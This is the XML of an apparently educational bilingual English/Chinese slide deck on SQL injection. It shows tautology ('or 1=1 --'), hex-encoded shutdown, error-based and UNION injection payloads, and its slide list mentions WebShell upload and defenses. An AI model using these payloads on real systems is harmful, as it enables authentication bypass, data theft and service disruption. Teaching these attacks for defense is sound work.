          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>Create a query that always evaluates to true for entries in the database. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>queryString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>= “SELECT info FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>userTable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> WHERE” + “login=‘” + login + “' AND pin=” + pin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Input login as “user’ or 1=1 --” </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg2">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg2">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>queryString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>= “SELECT info FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>userTable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> WHERE login=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" i="1" u="sng" dirty="0"/>
              <a:t>‘user‘ or 1=1 --' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>AND pin</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="灯片编号占位符 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{529B86CC-86F0-4D9D-9391-B8C947B5BF4D}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1127902" y="1596177"/>
            <a:ext cx="10150324" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" i="1" dirty="0"/>
              <a:t>恒真</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>命题攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击者注入的查询</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>结果</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>对数据库中的条目</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>始终</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>true</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>以绕过验证，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>确定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>参数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>或提取数据</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="355869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454744"/>
            <a:ext cx="10364451" cy="1596177"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Alternate Encodings</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1077549" y="2285890"/>
            <a:ext cx="10482106" cy="3908762"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>Encode attacks in such a way as to avoid naïve input filtering. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>queryString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>= “SELECT info FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>userTable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> WHERE” + “login=‘” + login + “' AND pin=” + pin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>pin as “0; declare @a char(20) select @a=0x73687574646f776e exec(@a)“ </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg2">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg2">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>SELECT info FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>userTable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> WHERE login=‘user' AND pin= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" i="1" u="sng" dirty="0"/>
              <a:t>0; declare @a char(20) select @a=0x73687574646f776e exec(@a)”</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" i="1" u="sng" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="灯片编号占位符 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{529B86CC-86F0-4D9D-9391-B8C947B5BF4D}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1077549" y="1681589"/>
            <a:ext cx="8488907" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" i="1" dirty="0"/>
              <a:t>其他编码攻击：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>为绕过输入的过滤，将攻击的代码以某种形式进行编码</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="253418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dirty="0"/>
              <a:t>Illegal/Logically Incorrect Queries</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="972602" y="3021234"/>
            <a:ext cx="10482106" cy="2739211"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Insert additional queries to be executed by the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Input (username): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>ddd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>Sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" i="1" dirty="0"/>
              <a:t>SELECT * FROM students WHERE username = '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" i="1" dirty="0" err="1"/>
              <a:t>ddd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" i="1" dirty="0"/>
              <a:t>"' AND password = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>Result:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" i="1" dirty="0" err="1"/>
              <a:t>"Incorrect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" i="1" dirty="0"/>
              <a:t> syntax near '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" i="1" dirty="0" err="1"/>
              <a:t>ddd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" i="1" dirty="0"/>
              <a:t>'. Unclosed quotation mark after the character string '' AND Password='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" i="1" dirty="0" err="1"/>
              <a:t>aaa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" i="1" dirty="0"/>
              <a:t>''."</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{529B86CC-86F0-4D9D-9391-B8C947B5BF4D}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="972602" y="1715088"/>
            <a:ext cx="9541409" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" i="1" dirty="0"/>
              <a:t>非法查询攻击：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击者通过注入非法或逻辑上不正确的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语法，这将使应用程序返回默认的错误页面</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>透露</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>关于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>应用程序的后端数据库的类型和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>结构等重要</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>信息给攻击者。这种攻击被认为是对其他</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入攻击的初步，信息收集的一步</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="65049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dirty="0"/>
              <a:t>Union Query</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913775" y="2506858"/>
            <a:ext cx="10482106" cy="2246769"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>An attacker injects an UNION SELECT to trick the application into returning data from a table different from the one that was </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>intended</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>example</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>normal SQL statement + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
              <a:t>"semi-colon"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> + UNION SELECT &lt;rest of injected </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{529B86CC-86F0-4D9D-9391-B8C947B5BF4D}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913775" y="1860527"/>
            <a:ext cx="8807215" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" i="1" dirty="0"/>
              <a:t>联合</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>查询攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击者注入的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>UNION SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>应用，从非目标表中返回数据</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3550197727"/>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1613</TotalTime>
  <Words>1856</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>244</Paragraphs>
  <Slides>32</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Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Tw Cen MT</vt:lpstr>
      <vt:lpstr>水滴</vt:lpstr>
      <vt:lpstr>From SQL injection to Shell </vt:lpstr>
      <vt:lpstr>SQL注入</vt:lpstr>
      <vt:lpstr>Sql injection 产生原因</vt:lpstr>
      <vt:lpstr>SQL注入 分类  ——按攻击手段分类</vt:lpstr>
      <vt:lpstr>Piggy-backed Queries</vt:lpstr>
      <vt:lpstr>Tautologies </vt:lpstr>
      <vt:lpstr>Alternate Encodings</vt:lpstr>
      <vt:lpstr>Illegal/Logically Incorrect Queries</vt:lpstr>
      <vt:lpstr>Union Query</vt:lpstr>
      <vt:lpstr>Stored Procedures</vt:lpstr>
      <vt:lpstr>SQL注入 分类  ——按获取数据方式</vt:lpstr>
      <vt:lpstr>SQL注入 危害</vt:lpstr>
      <vt:lpstr>实验举例</vt:lpstr>
      <vt:lpstr>指纹收集    通过浏览器自带的开发者工具</vt:lpstr>
      <vt:lpstr>指纹收集    通过浏览器自带的开发者工具</vt:lpstr>
      <vt:lpstr>SQL注入和利用</vt:lpstr>
      <vt:lpstr>SQL注入和利用</vt:lpstr>
      <vt:lpstr>SQL注入和利用</vt:lpstr>
      <vt:lpstr>SQL注入和利用</vt:lpstr>
      <vt:lpstr>SQL注入和利用</vt:lpstr>
      <vt:lpstr>SQL注入和利用</vt:lpstr>
      <vt:lpstr>SQL注入和利用</vt:lpstr>
      <vt:lpstr>SQL注入和利用</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>绕过过滤上传WebShell </vt:lpstr>
      <vt:lpstr>绕过过滤上传WebShell </vt:lpstr>
      <vt:lpstr>防御措施</vt:lpstr>
      <vt:lpstr>拓展实验——SQL盲注</vt:lpstr>
